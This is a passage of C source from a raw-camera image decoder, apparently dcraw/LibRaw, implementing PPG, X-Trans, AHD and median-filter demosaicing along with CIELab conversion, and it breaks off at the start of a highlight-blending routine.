while ((g = *ip++) != -1)
gval[g] += diff;
}
ip++;
gmin = gmax = gval[0]; /* Choose a threshold */
for (g=1; g < 8; g++) {
if (gmin > gval[g]) gmin = gval[g];
if (gmax < gval[g]) gmax = gval[g];
}
if (gmax == 0) {
memcpy (brow[2][col], pix, sizeof *image);
continue;
}
thold = gmin + (gmax >> 1);
memset (sum, 0, sizeof sum);
color = fcol(row,col);
for (num=g=0; g < 8; g++,ip+=2) { /* Average the neighbors */
if (gval[g] <= thold) {
FORCC
if (c == color && ip[1])
sum[c] += (pix[c] + pix[ip[1]]) >> 1;
else
sum[c] += pix[ip[0] + c];
num++;
}
}
FORCC { /* Save to buffer */
t = pix[color];
if (c != color)
t += (sum[c] - sum[color]) / num;
brow[2][col][c] = CLIP(t);
}
}
if (row > 3) /* Write buffer to image */
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
for (g=0; g < 4; g++)
brow[(g-1) & 3] = brow[g];
}
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
memcpy (image[(row-1)*width+2], brow[1]+2, (width-4)*sizeof *image);
free (brow[4]);
free (code[0][0]);
}
/*
Patterned Pixel Grouping Interpolation by Alain Desbiolles
*/
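/* PPG works in three passes: green is reconstructed first from horizontal and
 * vertical gradient guesses, then red/blue are filled at green sites along the
 * row and column, and finally red-at-blue / blue-at-red sites pick the diagonal
 * with the smaller color-difference gradient (or average both when equal).
 */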
void CLASS ppg_interpolate()
{
int dir[5] = { 1, width, -1, -width, 1 };
int row, col, diff[2], guess[2], c, d, i;
ushort (*pix)[4];
border_interpolate(3);
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("PPG interpolation...\n"));
#endif
/* Fill in the green layer with gradients and pattern recognition: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=3; row < height-3; row++)
for (col=3+(FC(row,3) & 1), c=FC(row,col); col < width-3; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; i++) {
guess[i] = (pix[-d][1] + pix[0][c] + pix[d][1]) * 2
- pix[-2*d][c] - pix[2*d][c];
diff[i] = ( ABS(pix[-2*d][c] - pix[ 0][c]) +
ABS(pix[ 2*d][c] - pix[ 0][c]) +
ABS(pix[ -d][1] - pix[ d][1]) ) * 3 +
( ABS(pix[ 3*d][1] - pix[ d][1]) +
ABS(pix[-3*d][1] - pix[-d][1]) ) * 2;
}
d = dir[i = diff[0] > diff[1]];
pix[0][1] = ULIM(guess[i] >> 2, pix[d][1], pix[-d][1]);
}
/* Calculate red and blue for each green pixel: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,2) & 1), c=FC(row,col+1); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; c=2-c, i++)
pix[0][c] = CLIP((pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1]) >> 1);
}
/* Calculate blue for red pixels and vice versa: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,1) & 1), c=2-FC(row,col); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]+dir[i+1]) > 0; i++) {
diff[i] = ABS(pix[-d][c] - pix[d][c]) +
ABS(pix[-d][1] - pix[0][1]) +
ABS(pix[ d][1] - pix[0][1]);
guess[i] = pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1];
}
if (diff[0] != diff[1])
pix[0][c] = CLIP(guess[diff[0] > diff[1]] >> 1);
else
pix[0][c] = CLIP((guess[0]+guess[1]) >> 2);
}
}
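/* cielab() converts one camera-RGB triple to a scaled CIELab value using a
 * precomputed cube-root table and the xyz_cam matrix; calling it as
 * cielab(0,0) (re)builds those tables from rgb_cam and the D65 white point.
 */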
void CLASS cielab (ushort rgb[3], short lab[3])
{
int c, i, j, k;
float r, xyz[3];
#ifdef LIBRAW_NOTHREADS
static float cbrt[0x10000], xyz_cam[3][4];
#else
#define cbrt tls->ahd_data.cbrt
#define xyz_cam tls->ahd_data.xyz_cam
#endif
if (!rgb) {
#ifndef LIBRAW_NOTHREADS
if(cbrt[0] < -1.0f)
#endif
for (i=0; i < 0x10000; i++) {
r = i / 65535.0;
cbrt[i] = r > 0.008856 ? pow(r,1.f/3.0f) : 7.787f*r + 16.f/116.0f;
}
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (xyz_cam[i][j] = k=0; k < 3; k++)
xyz_cam[i][j] += xyz_rgb[i][k] * rgb_cam[k][j] / d65_white[i];
return;
}
xyz[0] = xyz[1] = xyz[2] = 0.5;
FORCC {
xyz[0] += xyz_cam[0][c] * rgb[c];
xyz[1] += xyz_cam[1][c] * rgb[c];
xyz[2] += xyz_cam[2][c] * rgb[c];
}
xyz[0] = cbrt[CLIP((int) xyz[0])];
xyz[1] = cbrt[CLIP((int) xyz[1])];
xyz[2] = cbrt[CLIP((int) xyz[2])];
lab[0] = 64 * (116 * xyz[1] - 16);
lab[1] = 64 * 500 * (xyz[0] - xyz[1]);
lab[2] = 64 * 200 * (xyz[1] - xyz[2]);
#ifndef LIBRAW_NOTHREADS
#undef cbrt
#undef xyz_cam
#endif
}
#define TS 512 /* Tile Size */
#define fcol(row,col) xtrans[(row+6) % 6][(col+6) % 6]
/*
Frank Markesteijn's algorithm for Fuji X-Trans sensors
*/
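/* The image is processed in TS x TS tiles with 16-pixel overlap.  For each
 * tile the algorithm interpolates green in four (or, for multi-pass, eight)
 * directions, derives red/blue from color differences, converts every
 * directional result to CIELab, builds homogeneity maps from the Lab
 * derivatives, and finally averages the most homogeneous directions.
 */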
void CLASS xtrans_interpolate (int passes)
{
int c, d, f, g, h, i, v, ng, row, col, top, left, mrow, mcol;
#ifdef LIBRAW_LIBRARY_BUILD
int cstat[4]={0,0,0,0};
#endif
int val, ndir, pass, hm[8], avg[4], color[3][8];
static const short orth[12] = { 1,0,0,1,-1,0,0,-1,1,0,0,1 },
patt[2][16] = { { 0,1,0,-1,2,0,-1,0,1,1,1,-1,0,0,0,0 },
{ 0,1,0,-2,1,0,-2,0,1,1,-2,-2,1,-1,-1,1 } },
dir[4] = { 1,TS,TS+1,TS-1 };
short allhex[3][3][2][8], *hex;
ushort min, max, sgrow, sgcol;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab) [TS][3], (*lix)[3];
float (*drv)[TS][TS], diff[6], tr;
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("%d-pass X-Trans interpolation...\n"), passes);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(width < TS || height < TS)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // too small image
/* Check against right pattern */
for (row = 0; row < 6; row++)
for (col = 0; col < 6; col++)
cstat[fcol(row,col)]++;
if(cstat[0] < 6 || cstat[0]>10 || cstat[1]< 16
|| cstat[1]>24 || cstat[2]< 6 || cstat[2]>10 || cstat[3])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
// Initialize the allhex table with out-of-range sentinel values so that
// entries left unset are caught by the range check below
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
allhex[i][j][k][l]=32700;
#endif
cielab (0,0);
ndir = 4 << (passes > 1);
buffer = (char *) malloc (TS*TS*(ndir*11+6));
merror (buffer, "xtrans_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*) [TS][3])(buffer + TS*TS*(ndir*6));
drv = (float (*)[TS][TS]) (buffer + TS*TS*(ndir*6+6));
homo = (char (*)[TS][TS]) (buffer + TS*TS*(ndir*10+6));
int minv=0,maxv=0,minh=0,maxh=0;
/* Map a green hexagon around each non-green pixel and vice versa: */
for (row=0; row < 3; row++)
for (col=0; col < 3; col++)
for (ng=d=0; d < 10; d+=2) {
g = fcol(row,col) == 1;
if (fcol(row+orth[d],col+orth[d+2]) == 1) ng=0; else ng++;
if (ng == 4) { sgrow = row; sgcol = col; }
if (ng == g+1) FORC(8) {
v = orth[d ]*patt[g][c*2] + orth[d+1]*patt[g][c*2+1];
h = orth[d+2]*patt[g][c*2] + orth[d+3]*patt[g][c*2+1];
minv=MIN(v,minv);
maxv=MAX(v,maxv);
minh=MIN(h,minh);
maxh=MAX(h,maxh);
allhex[row][col][0][c^(g*2 & d)] = h + v*width;
allhex[row][col][1][c^(g*2 & d)] = h + v*TS;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Check allhex table initialization
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
if(allhex[i][j][k][l]>maxh+maxv*width+1 || allhex[i][j][k][l]<minh+minv*width-1)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int retrycount = 0;
#endif
/* Set green1 and green3 to the minimum and maximum allowed values: */
for (row=2; row < height-2; row++)
for (min=~(max=0), col=2; col < width-2; col++) {
if (fcol(row,col) == 1 && (min=~(max=0))) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
if (!max) FORC(6) {
val = pix[hex[c]][1];
if (min > val) min = val;
if (max < val) max = val;
}
pix[0][1] = min;
pix[0][3] = max;
switch ((row-sgrow) % 3) {
case 1: if (row < height-3) { row++; col--; } break;
case 2:
if ((min = ~(max = 0)) && (col += 2) < width - 3 && row > 2)
{
row--;
#ifdef LIBRAW_LIBRARY_BUILD
if(retrycount++ > width*height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
}
}
}
for (top=3; top < height-19; top += TS-16)
for (left=3; left < width-19; left += TS-16) {
mrow = MIN (top+TS, height-3);
mcol = MIN (left+TS, width-3);
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++)
memcpy (rgb[0][row-top][col-left], image[row*width+col], 6);
FORC3 memcpy (rgb[c+1], rgb[0], sizeof *rgb);
/* Interpolate green horizontally, vertically, and along both diagonals: */
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
color[1][0] = 174 * (pix[ hex[1]][1] + pix[ hex[0]][1]) -
46 * (pix[2*hex[1]][1] + pix[2*hex[0]][1]);
color[1][1] = 223 * pix[ hex[3]][1] + pix[ hex[2]][1] * 33 +
92 * (pix[ 0 ][f] - pix[ -hex[2]][f]);
FORC(2) color[1][2+c] =
164 * pix[hex[4+c]][1] + 92 * pix[-2*hex[4+c]][1] + 33 *
(2*pix[0][f] - pix[3*hex[4+c]][f] - pix[-3*hex[4+c]][f]);
FORC4 rgb[c^!((row-sgrow) % 3)][row-top][col-left][1] =
LIM(color[1][c] >> 8,pix[0][1],pix[0][3]);
}
for (pass=0; pass < passes; pass++) {
if (pass == 1)
memcpy (rgb+=4, buffer, 4*sizeof *rgb);
/* Recalculate green from interpolated values of closer pixels: */
if (pass) {
for (row=top+2; row < mrow-2; row++)
for (col=left+2; col < mcol-2; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][1];
for (d=3; d < 6; d++) {
rix = &rgb[(d-2)^!((row-sgrow) % 3)][row-top][col-left];
val = rix[-2*hex[d]][1] + 2*rix[hex[d]][1]
- rix[-2*hex[d]][f] - 2*rix[hex[d]][f] + 3*rix[0][f];
rix[0][1] = LIM(val/3,pix[0][1],pix[0][3]);
}
}
}
/* Interpolate red and blue values for solitary green pixels: */
for (row=(top-sgrow+4)/3*3+sgrow; row < mrow-2; row+=3)
for (col=(left-sgcol+4)/3*3+sgcol; col < mcol-2; col+=3) {
rix = &rgb[0][row-top][col-left];
h = fcol(row,col+1);
memset (diff, 0, sizeof diff);
for (i=1, d=0; d < 6; d++, i^=TS^1, h^=2) {
for (c=0; c < 2; c++, h^=2) {
g = 2*rix[0][1] - rix[i<<c][1] - rix[-i<<c][1];
color[h][d] = g + rix[i<<c][h] + rix[-i<<c][h];
if (d > 1)
diff[d] += SQR (rix[i<<c][1] - rix[-i<<c][1]
- rix[i<<c][h] + rix[-i<<c][h]) + SQR(g);
}
if (d > 1 && (d & 1))
if (diff[d-1] < diff[d])
FORC(2) color[c*2][d] = color[c*2][d-1];
if (d < 2 || (d & 1)) {
FORC(2) rix[0][c*2] = CLIP(color[c*2][d]/2);
rix += TS*TS;
}
}
}
/* Interpolate red for blue pixels and vice versa: */
for (row=top+3; row < mrow-3; row++)
for (col=left+3; col < mcol-3; col++) {
if ((f = 2-fcol(row,col)) == 1) continue;
rix = &rgb[0][row-top][col-left];
c = (row-sgrow) % 3 ? TS:1;
h = 3 * (c ^ TS ^ 1);
for (d=0; d < 4; d++, rix += TS*TS) {
i = d > 1 || ((d ^ c) & 1) ||
((ABS(rix[0][1]-rix[c][1])+ABS(rix[0][1]-rix[-c][1])) <
2*(ABS(rix[0][1]-rix[h][1])+ABS(rix[0][1]-rix[-h][1]))) ? c:h;
rix[0][f] = CLIP((rix[i][f] + rix[-i][f] +
2*rix[0][1] - rix[i][1] - rix[-i][1])/2);
}
}
/* Fill in red and blue for 2x2 blocks of green: */
for (row=top+2; row < mrow-2; row++) if ((row-sgrow) % 3)
for (col=left+2; col < mcol-2; col++) if ((col-sgcol) % 3) {
rix = &rgb[0][row-top][col-left];
hex = allhex[row % 3][col % 3][1];
for (d=0; d < ndir; d+=2, rix += TS*TS)
if (hex[d] + hex[d+1]) {
g = 3*rix[0][1] - 2*rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + 2*rix[hex[d]][c] + rix[hex[d+1]][c])/3);
} else {
g = 2*rix[0][1] - rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + rix[hex[d]][c] + rix[hex[d+1]][c])/2);
}
}
}
rgb = (ushort(*)[TS][TS][3]) buffer;
mrow -= top;
mcol -= left;
/* Convert to CIELab and differentiate in all directions: */
for (d=0; d < ndir; d++) {
for (row=2; row < mrow-2; row++)
for (col=2; col < mcol-2; col++)
cielab (rgb[d][row][col], lab[row][col]);
for (f=dir[d & 3],row=3; row < mrow-3; row++)
for (col=3; col < mcol-3; col++) {
lix = &lab[row][col];
g = 2*lix[0][0] - lix[f][0] - lix[-f][0];
drv[d][row][col] = SQR(g)
+ SQR((2*lix[0][1] - lix[f][1] - lix[-f][1] + g*500/232))
+ SQR((2*lix[0][2] - lix[f][2] - lix[-f][2] - g*500/580));
}
}
/* Build homogeneity maps from the derivatives: */
memset(homo, 0, ndir*TS*TS);
for (row=4; row < mrow-4; row++)
for (col=4; col < mcol-4; col++) {
for (tr=FLT_MAX, d=0; d < ndir; d++)
if (tr > drv[d][row][col])
tr = drv[d][row][col];
tr *= 8;
for (d=0; d < ndir; d++)
for (v=-1; v <= 1; v++)
for (h=-1; h <= 1; h++)
if (drv[d][row+v][col+h] <= tr)
homo[d][row][col]++;
}
/* Average the most homogeneous pixels for the final result: */
if (height-top < TS+4) mrow = height-top+2;
if (width-left < TS+4) mcol = width-left+2;
for (row = MIN(top,8); row < mrow-8; row++)
for (col = MIN(left,8); col < mcol-8; col++) {
for (d=0; d < ndir; d++)
for (hm[d]=0, v=-2; v <= 2; v++)
for (h=-2; h <= 2; h++)
hm[d] += homo[d][row+v][col+h];
for (d=0; d < ndir-4; d++)
if (hm[d] < hm[d+4]) hm[d ] = 0; else
if (hm[d] > hm[d+4]) hm[d+4] = 0;
for (max=hm[0],d=1; d < ndir; d++)
if (max < hm[d]) max = hm[d];
max -= max >> 3;
memset (avg, 0, sizeof avg);
for (d=0; d < ndir; d++)
if (hm[d] >= max) {
FORC3 avg[c] += rgb[d][row][col][c];
avg[3]++;
}
FORC3 image[(row+top)*width+col+left][c] = avg[c]/avg[3];
}
}
free(buffer);
border_interpolate(8);
}
#undef fcol
/*
Adaptive Homogeneity-Directed interpolation is based on
the work of Keigo Hirakawa, Thomas Parks, and Paul Lee.
*/
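/* AHD interpolates green horizontally and vertically, completes red/blue for
 * both candidates, converts them to CIELab, and at every pixel keeps the
 * candidate whose 3x3 neighborhood is more homogeneous in Lab space.
 */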
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS ahd_interpolate_green_h_and_v(int top, int left, ushort (*out_rgb)[TS][TS][3])
{
int row, col;
int c, val;
ushort (*pix)[4];
const int rowlimit = MIN(top+TS, height-2);
const int collimit = MIN(left+TS, width-2);
for (row = top; row < rowlimit; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < collimit; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
out_rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
out_rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
}
void CLASS ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][3], short (*out_lab)[TS][3])
{
unsigned row, col;
int c, val;
ushort (*pix)[4];
ushort (*rix)[3];
short (*lix)[3];
float xyz[3];
const unsigned num_pix_per_row = 4*width;
const unsigned rowlimit = MIN(top+TS-1, height-3);
const unsigned collimit = MIN(left+TS-1, width-3);
ushort *pix_above;
ushort *pix_below;
int t1, t2;
for (row = top+1; row < rowlimit; row++) {
pix = image + row*width + left;
rix = &inout_rgb[row-top][0];
lix = &out_lab[row-top][0];
for (col = left+1; col < collimit; col++) {
pix++;
pix_above = &pix[0][0] - num_pix_per_row;
pix_below = &pix[0][0] + num_pix_per_row;
rix++;
lix++;
c = 2 - FC(row, col);
if (c == 1) {
c = FC(row+1,col);
t1 = 2-c;
val = pix[0][1] + (( pix[-1][t1] + pix[1][t1]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][t1] = CLIP(val);
val = pix[0][1] + (( pix_above[c] + pix_below[c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else {
t1 = -4+c; /* -4+c: pixel of color c to the left */
t2 = 4+c; /* 4+c: pixel of color c to the right */
val = rix[0][1] + (( pix_above[t1] + pix_above[t2]
+ pix_below[t1] + pix_below[t2]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
}
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab(rix[0],lix[0]);
}
}
}
void CLASS ahd_interpolate_r_and_b_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][TS][3], short (*out_lab)[TS][TS][3])
{
int direction;
for (direction = 0; direction < 2; direction++) {
ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(top, left, inout_rgb[direction], out_lab[direction]);
}
}
void CLASS ahd_interpolate_build_homogeneity_map(int top, int left, short (*lab)[TS][TS][3], char (*out_homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int direction;
int i;
short (*lix)[3];
short (*lixs[2])[3];
short *adjacent_lix;
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
static const int dir[4] = { -1, 1, -TS, TS };
const int rowlimit = MIN(top+TS-2, height-4);
const int collimit = MIN(left+TS-2, width-4);
int homogeneity;
char (*homogeneity_map_p)[2];
memset (out_homogeneity_map, 0, 2*TS*TS);
for (row=top+2; row < rowlimit; row++) {
tr = row-top;
homogeneity_map_p = &out_homogeneity_map[tr][1];
for (direction=0; direction < 2; direction++) {
lixs[direction] = &lab[direction][tr][1];
}
for (col=left+2; col < collimit; col++) {
tc = col-left;
homogeneity_map_p++;
for (direction=0; direction < 2; direction++) {
lix = ++lixs[direction];
for (i=0; i < 4; i++) {
adjacent_lix = lix[dir[i]];
ldiff[direction][i] = ABS(lix[0][0]-adjacent_lix[0]);
abdiff[direction][i] = SQR(lix[0][1]-adjacent_lix[1])
+ SQR(lix[0][2]-adjacent_lix[2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (direction=0; direction < 2; direction++) {
homogeneity = 0;
for (i=0; i < 4; i++) {
if (ldiff[direction][i] <= leps && abdiff[direction][i] <= abeps) {
homogeneity++;
}
}
homogeneity_map_p[0][direction] = homogeneity;
}
}
}
}
void CLASS ahd_interpolate_combine_homogeneous_pixels(int top, int left, ushort (*rgb)[TS][TS][3], char (*homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int i, j;
int direction;
int hm[2];
int c;
const int rowlimit = MIN(top+TS-3, height-5);
const int collimit = MIN(left+TS-3, width-5);
ushort (*pix)[4];
ushort (*rix[2])[3];
for (row=top+3; row < rowlimit; row++) {
tr = row-top;
pix = &image[row*width+left+2];
for (direction = 0; direction < 2; direction++) {
rix[direction] = &rgb[direction][tr][2];
}
for (col=left+3; col < collimit; col++) {
tc = col-left;
pix++;
for (direction = 0; direction < 2; direction++) {
rix[direction]++;
}
for (direction=0; direction < 2; direction++) {
hm[direction] = 0;
for (i=tr-1; i <= tr+1; i++) {
for (j=tc-1; j <= tc+1; j++) {
hm[direction] += homogeneity_map[i][j][direction];
}
}
}
if (hm[0] != hm[1]) {
memcpy(pix[0], rix[hm[1] > hm[0]][0], 3 * sizeof(ushort));
} else {
FORC3 {
pix[0][c] = (rix[0][0][c] + rix[1][0][c]) >> 1;
}
}
}
}
}
void CLASS ahd_interpolate()
{
int i, j, k, top, left;
float xyz_cam[3][4],r;
char *buffer;
ushort (*rgb)[TS][TS][3];
short (*lab)[TS][TS][3];
char (*homo)[TS][2];
int terminate_flag = 0;
cielab(0,0);
border_interpolate(5);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel private(buffer,rgb,lab,homo,top,left,i,j,k) shared(xyz_cam,terminate_flag)
#endif
#endif
{
buffer = (char *) malloc (26*TS*TS); /* 1664 kB */
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][2]) (buffer + 24*TS*TS);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp for schedule(dynamic)
#endif
#endif
for (top=2; top < height-5; top += TS-6){
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
if(0== omp_get_thread_num())
#endif
if(callbacks.progress_cb) {
int rr = (*callbacks.progress_cb)(callbacks.progresscb_data,LIBRAW_PROGRESS_INTERPOLATE,top-2,height-7);
if(rr)
terminate_flag = 1;
}
#endif
for (left=2; !terminate_flag && (left < width-5); left += TS-6) {
ahd_interpolate_green_h_and_v(top, left, rgb);
ahd_interpolate_r_and_b_and_convert_to_cielab(top, left, rgb, lab);
ahd_interpolate_build_homogeneity_map(top, left, lab, homo);
ahd_interpolate_combine_homogeneous_pixels(top, left, rgb, homo);
}
}
free (buffer);
}
#ifdef LIBRAW_LIBRARY_BUILD
if(terminate_flag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
}
#else
void CLASS ahd_interpolate()
{
int i, j, top, left, row, col, tr, tc, c, d, val, hm[2];
static const int dir[4] = { -1, 1, -TS, TS };
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab)[TS][TS][3], (*lix)[3];
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("AHD interpolation...\n"));
#endif
cielab (0,0);
border_interpolate(5);
buffer = (char *) malloc (26*TS*TS);
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][TS]) (buffer + 24*TS*TS);
for (top=2; top < height-5; top += TS-6)
for (left=2; left < width-5; left += TS-6) {
/* Interpolate green horizontally and vertically: */
for (row=top; row < top+TS && row < height-2; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < left+TS && col < width-2; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
/* Interpolate red and blue, and convert to CIELab: */
for (d=0; d < 2; d++)
for (row=top+1; row < top+TS-1 && row < height-3; row++)
for (col=left+1; col < left+TS-1 && col < width-3; col++) {
pix = image + row*width+col;
rix = &rgb[d][row-top][col-left];
lix = &lab[d][row-top][col-left];
if ((c = 2 - FC(row,col)) == 1) {
c = FC(row+1,col);
val = pix[0][1] + (( pix[-1][2-c] + pix[1][2-c]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][2-c] = CLIP(val);
val = pix[0][1] + (( pix[-width][c] + pix[width][c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else
val = rix[0][1] + (( pix[-width-1][c] + pix[-width+1][c]
+ pix[+width-1][c] + pix[+width+1][c]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab (rix[0],lix[0]);
}
/* Build homogeneity maps from the CIELab images: */
memset (homo, 0, 2*TS*TS);
for (row=top+2; row < top+TS-2 && row < height-4; row++) {
tr = row-top;
for (col=left+2; col < left+TS-2 && col < width-4; col++) {
tc = col-left;
for (d=0; d < 2; d++) {
lix = &lab[d][tr][tc];
for (i=0; i < 4; i++) {
ldiff[d][i] = ABS(lix[0][0]-lix[dir[i]][0]);
abdiff[d][i] = SQR(lix[0][1]-lix[dir[i]][1])
+ SQR(lix[0][2]-lix[dir[i]][2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (d=0; d < 2; d++)
for (i=0; i < 4; i++)
if (ldiff[d][i] <= leps && abdiff[d][i] <= abeps)
homo[d][tr][tc]++;
}
}
/* Combine the most homogeneous pixels for the final result: */
for (row=top+3; row < top+TS-3 && row < height-5; row++) {
tr = row-top;
for (col=left+3; col < left+TS-3 && col < width-5; col++) {
tc = col-left;
for (d=0; d < 2; d++)
for (hm[d]=0, i=tr-1; i <= tr+1; i++)
for (j=tc-1; j <= tc+1; j++)
hm[d] += homo[d][i][j];
if (hm[0] != hm[1])
FORC3 image[row*width+col][c] = rgb[hm[1] > hm[0]][tr][tc][c];
else
FORC3 image[row*width+col][c] =
(rgb[0][tr][tc][c] + rgb[1][tr][tc][c]) >> 1;
}
}
}
free (buffer);
}
#endif
#undef TS
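/* median_filter() runs med_passes passes of a 3x3 median over the R-G and B-G
 * color-difference planes, using a fixed optimal 9-element sorting network.
 */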
void CLASS median_filter()
{
ushort (*pix)[4];
int pass, c, i, j, k, med[9];
static const uchar opt[] = /* Optimal 9-element median search */
{ 1,2, 4,5, 7,8, 0,1, 3,4, 6,7, 1,2, 4,5, 7,8,
0,3, 5,8, 4,7, 3,6, 1,4, 2,5, 4,7, 4,2, 6,4, 4,2 };
for (pass=1; pass <= med_passes; pass++) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_MEDIAN_FILTER,pass-1,med_passes);
#endif
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Median filter pass %d...\n"), pass);
#endif
for (c=0; c < 3; c+=2) {
for (pix = image; pix < image+width*height; pix++)
pix[0][3] = pix[0][c];
for (pix = image+width; pix < image+width*(height-1); pix++) {
if ((pix-image+1) % width < 2) continue;
for (k=0, i = -width; i <= width; i += width)
for (j = i-1; j <= i+1; j++)
med[k++] = pix[j][3] - pix[j][1];
for (i=0; i < sizeof opt; i+=2)
if (med[opt[i]] > med[opt[i+1]])
SWAP (med[opt[i]] , med[opt[i+1]]);
pix[0][c] = CLIP(med[4] + pix[0][1]);
}
}
}
}
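/* blend_highlights() desaturates clipped pixels: each pixel with a channel
 * above the clip level is transformed into an opponent space, its chroma is
 * scaled by the ratio of clipped to unclipped chroma, and the result is
 * transformed back to camera RGB.
 */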
void CLASS blend_highlights()
{
int clip=INT_MAX, row, col, c, i, j;
static const float trans[2][4][4] =
{ { { 1,1,1 }, { 1.7320508,-1.7320508,0 }, { -1,-1,2 } },
